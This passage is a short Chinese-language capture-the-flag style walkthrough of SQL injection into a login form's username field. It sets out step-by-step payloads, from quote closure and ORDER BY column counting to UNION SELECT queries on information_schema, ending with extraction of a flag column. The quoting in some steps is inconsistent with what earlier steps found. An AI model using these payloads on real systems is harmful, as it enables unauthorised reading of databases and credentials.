1.判斷是否存在注入

uname='&passwd=a&submit=Submit

錯誤回顯 => 存在注入

2.判斷引數型別

uname=1 or 1=1 #&passwd=a&submit=Submit

正確回顯

uname=1" or 1=1 #&passwd=a&submit=Submit

錯誤回顯 => 字元型

3.進行引數閉合

uname=1" or 1=1 #&passwd=a&submit=Submit

錯誤回顯

uname=1") or 1=1#&passwd=a&submit=Submit

登入回顯 => 閉合成功

4.檢視這個網站後臺資料庫所在的表有幾列

uname=' or 1=1 order by 2#&passwd=a&submit=Submit

正確回顯

uname=' or 1=1 order by 3#&passwd=a&submit=Submit

錯誤回顯 => 有2列

5.進行 union select聯合查詢，發現輸出位

uname='union select 1,2#&passwd=a&submit=Submit

6.檢視所在資料庫和資料庫版本

uname='union select database(),version()#&passwd=a&submit=Submit

7.檢視資料庫的表

uname='union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #&passwd=a&submit=Submit

8.檢視DPXE2rot表中的列

uname='union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name="DPXE2rot" #&passwd=a&submit=Submit

9.查看錶中的flag列中的資料

uname='union select 1,flag from DPXE2rot limit 3,1 #&passwd=a&submit=Submit